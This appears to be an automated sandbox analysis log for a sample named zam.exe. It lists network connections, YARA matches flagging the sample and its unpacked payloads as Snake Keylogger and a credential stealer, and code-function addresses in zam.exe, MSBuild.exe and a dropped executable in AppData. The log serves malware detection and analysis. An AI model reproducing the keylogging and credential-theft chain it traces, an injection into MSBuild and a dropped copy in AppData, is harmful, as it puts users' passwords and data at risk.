Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62023
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62025
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62028
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.10:49708 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 5892, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

.NET source code contains very large array initializations

Source: zam.exe, Resources.cs

Large array initialization: : array initializer size 659928

Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_069885A0	0_2_069885A0
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698AA28	0_2_0698AA28
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698C0F8	0_2_0698C0F8
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_069858E0	0_2_069858E0
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06982106	0_2_06982106
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06985178	0_2_06985178
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698AA18	0_2_0698AA18
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698E3B0	0_2_0698E3B0
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698C0E8	0_2_0698C0E8
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698F98F	0_2_0698F98F
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_0698F9A0	0_2_0698F9A0
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DADC50	0_2_06DADC50
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA6648	0_2_06DA6648
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA95E0	0_2_06DA95E0
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA6210	0_2_06DA6210
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA61FF	0_2_06DA61FF
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA5DD8	0_2_06DA5DD8
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA7D20	0_2_06DA7D20
Source: C:\Users\user\Desktop\zam.exe	Code function: 0_2_06DA78E8	0_2_06DA78E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290B328	16_2_0290B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290C190	16_2_0290C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_02906108	16_2_02906108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_029097E8	16_2_029097E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290C752	16_2_0290C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290F778	16_2_0290F778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290E431	16_2_0290E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290C470	16_2_0290C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_02904AD9	16_2_02904AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290CA32	16_2_0290CA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290BBB8	16_2_0290BBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_02906880	16_2_02906880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290BEB0	16_2_0290BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290D7F0	16_2_0290D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290D7E0	16_2_0290D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0290B4F2	16_2_0290B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_02903572	16_2_02903572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AD218	16_2_065AD218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AEE0D	16_2_065AEE0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AA600	16_2_065AA600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AB290	16_2_065AB290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065ABF30	16_2_065ABF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065ACBD0	16_2_065ACBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A8BF9	16_2_065A8BF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A9FB0	16_2_065A9FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AAC48	16_2_065AAC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AB8E0	16_2_065AB8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A0D48	16_2_065A0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AC580	16_2_065AC580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A85B0	16_2_065A85B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5E70	16_2_065A5E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5E60	16_2_065A5E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5A18	16_2_065A5A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AD20A	16_2_065AD20A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5A08	16_2_065A5A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A36D8	16_2_065A36D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A62C8	16_2_065A62C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AB281	16_2_065AB281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A62BA	16_2_065A62BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A3350	16_2_065A3350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6B78	16_2_065A6B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6B69	16_2_065A6B69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A3360	16_2_065A3360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6712	16_2_065A6712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6720	16_2_065A6720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065ABF20	16_2_065ABF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A43D8	16_2_065A43D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065ACBC0	16_2_065ACBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6FF8	16_2_065A6FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A6FF1	16_2_065A6FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A9FA0	16_2_065A9FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A2858	16_2_065A2858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A7450	16_2_065A7450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A2848	16_2_065A2848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A0040	16_2_065A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A001E	16_2_065A001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AAC38	16_2_065AAC38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A743F	16_2_065A743F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AB8D0	16_2_065AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A08F0	16_2_065A08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A7CF0	16_2_065A7CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A08E1	16_2_065A08E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A0498	16_2_065A0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A7898	16_2_065A7898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A0488	16_2_065A0488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A78A8	16_2_065A78A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A8158	16_2_065A8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A8148	16_2_065A8148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5140	16_2_065A5140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AC570	16_2_065AC570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A7D00	16_2_065A7D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A0D39	16_2_065A0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5132	16_2_065A5132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A55C0	16_2_065A55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AA5F0	16_2_065AA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A5588	16_2_065A5588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065A85AA	16_2_065A85AA
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056A1458	17_2_056A1458
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056A1E08	17_2_056A1E08
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056A1E18	17_2_056A1E18
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_076685A0	17_2_076685A0
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766AA28	17_2_0766AA28
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_07665178	17_2_07665178
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_07662106	17_2_07662106
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766C0F8	17_2_0766C0F8
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766E3B0	17_2_0766E3B0
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766AA18	17_2_0766AA18
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766F969	17_2_0766F969
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766F9A0	17_2_0766F9A0
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_0766C0E8	17_2_0766C0E8
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F9CA40	17_2_09F9CA40
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F97A18	17_2_09F97A18
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F95F08	17_2_09F95F08
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F97E50	17_2_09F97E50
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F96340	17_2_09F96340
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F96330	17_2_09F96330
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_09F96778	17_2_09F96778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016B6108	21_2_016B6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BC190	21_2_016BC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BB328	21_2_016BB328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BC470	21_2_016BC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BE431	21_2_016BE431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BF778	21_2_016BF778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BC752	21_2_016BC752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016B9858	21_2_016B9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016B6880	21_2_016B6880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BBBB8	21_2_016BBBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BCA32	21_2_016BCA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016B4AD9	21_2_016B4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BBEB0	21_2_016BBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BD7E0	21_2_016BD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_016BD7F0	21_2_016BD7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0D60	21_2_056B0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B7588	21_2_056B7588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BBC08	21_2_056BBC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B7E78	21_2_056B7E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B3288	21_2_056B3288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BCD68	21_2_056BCD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B7D7E	21_2_056B7D7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BCD58	21_2_056BCD58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0D50	21_2_056B0D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC901	21_2_056BC901
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0900	21_2_056B0900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC910	21_2_056BC910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B6DF6	21_2_056B6DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BD1C0	21_2_056BD1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BD1B0	21_2_056BD1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC060	21_2_056BC060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF471	21_2_056BF471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0040	21_2_056B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC050	21_2_056BC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF028	21_2_056BF028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0006	21_2_056B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF018	21_2_056BF018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B08F0	21_2_056B08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF8C9	21_2_056BF8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF8D8	21_2_056BF8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC4A8	21_2_056BC4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B04A0	21_2_056B04A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BC4B8	21_2_056BC4B8
